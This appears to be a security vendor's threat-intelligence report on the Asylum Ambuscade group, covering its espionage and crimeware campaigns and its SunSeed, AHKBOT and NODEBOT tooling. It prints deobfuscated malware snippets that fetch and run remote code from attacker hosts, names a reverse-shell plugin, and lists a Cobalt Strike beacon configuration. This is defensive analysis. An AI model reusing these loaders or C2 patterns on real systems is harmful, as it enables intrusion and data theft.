Asylum Ambuscade: crimeware or cyberespionage?

Asylum Ambuscade is a cybercrime group that has been performing cyberespionage operations on the side. They were first publicly outed in March 2022 by Proofpoint researchers after the group targeted European government staff involved in helping Ukrainian refugees, just a few weeks after the start of the Russia-Ukraine war. In this blogpost, we provide details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.

Cyberespionage campaigns

Asylum Ambuscade has been running cyberespionage campaigns since at least 2020. We found previous compromises of government officials and employees of state-owned companies in Central Asia countries and Armenia.

In 2022, and as highlighted in the Proofpoint publication, the group targeted government officials in several European countries bordering Ukraine. We assess that the goal of the attackers was to steal confidential information and webmail credentials from official government webmail portals.

The compromise chain starts with a spearphishing email that has a malicious Excel spreadsheet attachment. Malicious VBA code therein downloads an MSI package from a remote server and installs SunSeed, a downloader written in Lua.

Note that we observed some variations in the attachments. In June 2022, the group used an exploit of the Follina vulnerability (CVE-2022-30190) instead of malicious VBA code. This document is shown in Figure 1. It is written in Ukrainian and the decoy is about a security alert regarding a Gamaredon (another well-known espionage group) attack in Ukraine.

Figure 1. Document leveraging the Follina vulnerability

Then, if the machine is deemed interesting, the attackers deploy the next stage: AHKBOT. This is a downloader written in AutoHotkey that can be extended with plugins, also written in AutoHotkey, in order to spy on the victim’s machine. An analysis of the group’s toolset is provided later in the blogpost.

Cybercrime campaigns

Even though the group came into the spotlight because of its cyberespionage operations, it has been mostly running cybercrime campaigns since early 2020.

Since January 2022, we have counted more than 4,500 victims worldwide. While most of them are located in North America, as shown in Figure 2, it should be noted that we have also seen victims in Asia, Africa, Europe, and South America.

Figure 2. Geographical distribution of victims since January 2022

The targeting is very wide and mostly includes individuals, cryptocurrency traders, and small and medium businesses (SMBs) in various verticals.

While the goal of targeting cryptocurrency traders is quite obvious – stealing cryptocurrency – we don’t know for sure how Asylum Ambuscade monetizes its access to SMBs. It is possible the group sells the access to other crimeware groups who might, for example, deploy ransomware. We have not observed this in our telemetry, though.

Asylum Ambuscade’s crimeware compromise chain is, overall, very similar to the one we describe for the cyberespionage campaigns. The main difference is the compromise vector, which can be:

• A malicious Google Ad redirecting to a website delivering a malicious JavaScript file (as highlighted in this SANS blogpost)
• Multiple HTTP redirections in a Traffic Direction System (TDS). The TDS used by the group is referred to as 404 TDS by Proofpoint. It is not exclusive to Asylum Ambuscade and we observed it was, for example, used by another threat actor to deliver Qbot. An example of a redirection chain, captured by io, is shown in Figure 3.

Figure 3. 404 TDS redirection chain, as captured by urlscan.io – numbers indicate the redirections in sequence

In addition to the different compromise vector, the group developed SunSeed equivalents in other scripting languages such as Tcl and VBS. In March 2023, it developed an AHKBOT equivalent in Node.js that we named NODEBOT. We believe those changes were intended to bypass detections from security products. An overview of the compromise chain is provided in Figure 4.

Figure 4. Compromise chain

Attribution

We believe that the cyberespionage and cybercrime campaigns are operated by the same group.

• The compromise chains are almost identical in all campaigns. In particular, SunSeed and AHKBOT have been widely used for both cybercrime and cyberespionage.
• We don’t believe that SunSeed and AHKBOT are sold on the underground market. These tools are not very sophisticated in comparison to other crimeware tools for sale, the number of victims is quite low were it a toolset shared among multiple groups, and the network infrastructure is consistent across campaigns.

As such, we believe that Asylum Ambuscade is a cybercrime group that is doing some cyberespionage on the side.

We also believe that these three articles describe incidents related to the group:

• A TrendMicro article from 2020: Credential Stealer Targets US, Canadian Bank Customers
• A Proofpoint article from 2022: Asylum Ambuscade: State Actor Uses Lua-based Sunseed Malware to Target European Governments and Refugee Movement
• A Proofpoint article from 2023: Screentime: Sometimes It Feels Like Somebody's Watching Me

Toolset

Malicious JavaScript files

In most crimeware campaigns run by the group, the compromise vector is not a malicious document, but a JavaScript file downloaded from the previously documented TDS. Note that it has to be manually executed by the victim, so the attackers are trying to entice people into clicking on the files by using filenames such as Document_12_dec-1532825.js, TeamViewer_Setup.js, or AnyDeskInstall.js.

Those scripts are obfuscated using random variable names and junk code, most likely intended to bypass detections. An example is provided in Figure 5.

Figure 5. Obfuscated JavaScript downloader

Once deobfuscated, this script can be summarized in two lines:

var obj = new ActiveXObject("windowsinstaller.installer");
obj.InstallProduct("https://namesilo.my[.]id/css/ke.msi");

First-stage downloaders

The first stage downloaders are dropped by an MSI package downloaded by either a malicious document or a JavaScript file. There are three versions of this downloader:

• Lua (SunSeed)
• Tcl
• VBS

SunSeed is a downloader written in the Lua language and heavily obfuscated, as shown in Figure 6.

Figure 6. The SunSeed Lua variant is heavily obfuscated

Once manually deobfuscated, the main function of the script looks like this:

require('socket.http')
serial_number = Drive.Item('C').SerialNumber
server_response = socket.request(http://84.32.188[.]96/ + serial_number)
pcall(loadstring(server_response))
collectgarbage()
<jump to the start and retry>

It gets the serial number of the C: drive and sends a GET request to http://<C&C>/<serial_number> using the User-Agent LuaSocket 2.0.2. It then tries to execute the reply. This means that SunSeed expects to receive additional Lua scripts from the C&C server. We found two of those scripts: install and move.

install is a simple Lua script that downloads an AutoHotkey script into C:\ProgramData\mscoree.ahk and the legitimate AutoHotkey interpreter into C:\ProgramData\mscoree.exe, as shown in Figure 7. This AutoHotkey script is AHKBOT, the second stage downloader.

Figure 7. Lua script that downloads an AutoHotkey script

An even simpler Lua script, move, is shown in Figure 8. It is used to reassign management of a victimized computer from one C&C server to another. It is not possible to update the hardcoded SunSeed C&C server; to complete a C&C reassignment, a new MSI installer needs to be downloaded and executed, exactly as when the machine was first compromised.

Figure 8. Lua script to move management of a compromised machine from one C&C server to another

As mentioned above, we found another variant of SunSeed developed using the Tcl language instead of Lua, as shown in Figure 9. The main difference is that it doesn’t send the C: drive’s serial number in the GET request.

Figure 9. SunSeed variant in Tcl

The third variant was developed in VBS, as shown in Figure 10. The main difference is that it doesn’t download and interpret additional code, but downloads and executes an MSI package.

Figure 10. SunSeed variant in VBS

Second-stage downloaders

The main second-stage downloader is AHKBOT, developed in AutoHotkey. As shown in Figure 11, it sends a GET request, with the User-Agent AutoHotkey (the default value used by AutoHotkey), to http://<C&C>/<serial_number_of_C_drive>-RP, almost exactly as the earlier SunSeed. RP might be a campaign identifier, as it changes from sample to sample.

Figure 11. AHKBOT

AHKBOT can be found on disk at various locations, such as C:\ProgramData\mscoree.ahk or C:\ProgramData\adb.ahk. It downloads and interprets spy plugins, also developed in AutoHotkey. A summary of the 21 plugins is provided in Table 1.

Table 1. SunSeed plugins

The plugins send the result back to the C&C server using a log function, as shown in Figure 12.

Figure 12. Log function

In March 2023, the attackers developed a variant of AHKBOT in Node.js that we have named NODEBOT – see Figure 13.

Figure 13. NODEBOT

The attackers also rewrote some AHKBOT plugins in JavaScript to make them compatible with NODEBOT. So far, we have observed the following plugins (an asterisk indicates that the plugin is new to NODEBOT):

• connect
• deskscreen
• hardware
• hcmdon (a reverse shell in Node.js)*
• hvncoff
• hvncon
• keylogoff
• keylogon (download and execute the AutoHotkey keylogger)
• mods (download and install hVNC)*
• passwords
• screen

Conclusion

Asylum Ambuscade is a cybercrime group mostly targeting SMBs and individuals in North America and Europe. However, it appears to be branching out, running some recent cyberespionage campaigns on the side, against governments in Central Asia and Europe from time to time.

It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations, and as such we believe that researchers should keep close track of Asylum Ambuscade activities.

IoCs

Files

Network

Cobalt Strike configuration

BeaconType                       - HTTP
Port                             - 80
SleepTime                        - 45000
MaxGetSize                       - 2801745
Jitter                           - 37
MaxDNS                           - Not Found
PublicKey_MD5                    - e4394d2667cc8f9d0af0bbde9e808c29
C2Server                         - snowzet[.]com,/jquery-3.3.1.min.js
UserAgent                        - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
HttpPostUri                      - /jquery-3.3.2.min.js
Malleable_C2_Instructions        - Remove 1522 bytes from the end
                                   Remove 84 bytes from the beginning
                                   Remove 3931 bytes from the beginning
                                   Base64 URL-safe decode
                                   XOR mask w/ random key
HttpGet_Metadata                 - ConstHeaders
                                   	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                   	Referer: http://code.jquery.com/
                                   	Accept-Encoding: gzip, deflate
                                   Metadata
                                   	base64url
                                   	prepend "__cfduid="
                                   	header "Cookie"
HttpPost_Metadata                - ConstHeaders
                                   	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                   	Referer: http://code.jquery.com/
                                   	Accept-Encoding: gzip, deflate
                                   SessionId
                                   	mask
                                   	base64url
                                   	parameter "__cfduid"
                                   Output
                                   	mask
                                   	base64url
                                   	print
PipeName                         - Not Found
DNS_Idle                         - Not Found
DNS_Sleep                        - Not Found
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
SSH_Password_Pubkey              - Not Found
SSH_Banner                       - 
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\dllhost.exe
Spawnto_x64                      - %windir%\sysnative\dllhost.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark                        - 206546002
bStageCleanup                    - True
bCFGCaution                      - False
KillDate                         - 0
bProcInject_StartRWX             - False
bProcInject_UseRWX               - False
bProcInject_MinAllocSize         - 17500
ProcInject_PrependAppend_x86     - b'\x90\x90'
                                   Empty
ProcInject_PrependAppend_x64     - b'\x90\x90'
                                   Empty
ProcInject_Execute               - ntdll:RtlUserThreadStart
                                   CreateThread
                                   NtQueueApcThread-s
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - NtMapViewOfSection
bUsesCookies                     - True
HostHeader                       - 
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - round-robin
DNS_strategy_rotate_seconds      - -1
DNS_strategy_fail_x              - -1
DNS_strategy_fail_seconds        - -1

MITRE ATT&CK techniques

This table was built using version 13 of the MITRE ATT&CK framework.